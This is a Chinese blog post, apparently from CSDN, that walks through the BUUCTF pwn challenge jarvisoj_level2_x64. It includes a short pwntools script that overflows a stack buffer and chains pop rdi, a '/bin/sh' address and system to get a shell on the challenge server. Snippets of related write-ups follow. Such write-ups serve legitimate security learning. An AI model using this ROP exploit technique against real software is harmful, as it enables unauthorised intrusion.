[BUUCTF-pwn]——jarvisoj_level2_x64

最新推荐文章于 2024-07-05 00:58:41 发布

Y-peak

最新推荐文章于 2024-07-05 00:58:41 发布

阅读量352

点赞数 1

分类专栏： # BUUCTF

本文链接：https://blog.csdn.net/Y_peak/article/details/113789424

版权

BUUCTF 专栏收录该内容

89 篇文章 8 订阅

订阅专栏

[BUUCTF-pwn]——jarvisoj_level2_x64

题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64

checksec 一下,64位 ,开启NX保护
在这里插入图片描述
64位应该会用到pop rdi这个汇编指令

在IDA中看看
在这里插入图片描述

思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数

exploit

from pwn import *
p = remote("node3.buuoj.cn",27828)
binsh = 0x0600A90
sys_addr = 0x0400603
pop_rdi = 0x04006b3
payload = 'a' * (0x80 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
p.sendline(payload)
p.interactive()

希望你可以点个赞,打赏一下哟 😃

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

(Jarvis Oj)(Pwn) level2(x64)

Nothing

04-19

1443

(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护，和level2一样。反汇编，程序和32位的程序几乎一致。找到溢出点。那么溢出思路也和32位的差不多，唯一不同的是，64位程序在调用system函数时，参数的传递方式和32位不一样，32位是通过栈传参，而64位通过edi寄存器传参，所以这时我们的思路变成如何覆盖edi的值，通过基本rop就可...

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

993

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF pwn——jarvisoj_level2_x64

CNS-Enterprise BCC-1701-J

04-03

276

BUUCTF 做题练习

【BUUCTF-PWN】13-jarvisoj_level2_x64

最新发布

燕麦葡萄干的博客

07-05

430

ret指令的地址，再接着是’/bin/sh’字符串的地址，最后是system()函数的地址。ret处，该指令会将当前栈顶的元素（‘/bin/sh’字符串的地址）出栈并存入rdi中，并返回到下一条指令处。此时栈中就只有system()函数的地址了，所以下一条指令正是system()，而它需要的参数正好就在rdi寄存器中，这样就执行了system(’/bin/sh’)现在只需要让函数返回到system，并传入参数“/bin/sh”就可以了。32位的比较简单，只需要返回地址+下一次的返回地址+参数1+参数2+…

jarvisoj_level2_x64[BUUCTF]

moonlightsunshin的博客

05-04

380

32位中参数都是保存在栈上，但在64位中的前六个参数依次保存在RDI，RSI，RDX，RCX，R8和 R9中，如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,

buuctf|pwn-jarvisoj_level2_x64-wp

l2645470582_的博客

11-08

457

1.例行检查保护机制只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串，我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为：0x0600A90 3.查看main函数里面的内容进入vulnerable_function()函数我们看到buf只有0x80个字节，但是下面read（）里面读取了0x200个，这里造成了溢出 4.system("/bin/sh")才能拿到权限我们找...

BUUCTF jarvisoj_level2_x64

小白垃圾笔记2

05-12

302

因为有栈对齐所以需要ret，因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记，不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。

BUUCTF---jarvisoj_level4

qq_33010875的博客

09-26

285

环境：WSL2，ubuntu16.04，python2 checksec文件: 将文件拖入ida 溢出点：和level3不同的是 read函数之前没有调用write函数，因此要泄露libc的基地址需要用read函数，利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(

BUUCTF----jarvisoj_level3_x64

qq_33010875的博客

09-26

487

环境：WSL2，ubuntu16.04，python2 checksec文件：这道题level3的思路一样，只是32位的程序改成了64位。也就是说，在利用write函数泄露出libc的基地址时，需要用到寄存器来穿参数，write有三个参数，所以需要rdi，rsi，rdx三个寄存器，通过命令： ROPgadget --binary level3_x64 |grep "pop" 结果：从图中可以看到只找到了rdi和rsi寄存器，没有rdx寄存器尝试gdb程序：在read函数下断点，可以看到rd

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

687

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

[BUUCTF]PWN-jarvisoj_level4

红凳子的博客

04-07

531

[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一：使用LibcSearcher寻找libc版本方法二：使用DynELF函数进行泄露前言在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用提示：以下是本篇文章正文内容，下面案例可供参考一、程序分析从中可以看出，32位程序，i386架构，开启了NX保护。输入点在vulnerable_function里，read试图向长度0x88的地址空间写入0x10

[BUUCTF]PWN——jarvisoj_level2_x64

BangSen1的博客

03-30

1397

jarvisoj_level2_x64 例行检查，64位，开启NX保护，运行一下用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数，buf的长度为0x80,读取的长度为0x200，可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',

buuctf jarvisoj_level2_x64

carol2358的博客

04-22

394

水题栈溢出，system和binsh都可以用gdb找到 exp： from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...

jarvisoj_level2_x64

、moddemod

06-17

539

exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..

jarvis oj---level2x64

weixin_45427676的博客

09-29

332

题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别： linux_64与linux_86的区别主要有两点：首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff，否则会抛出异常。其次是函数参数的传递方式发生了改变，x86...

jarvisoj_level1

08-28

- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...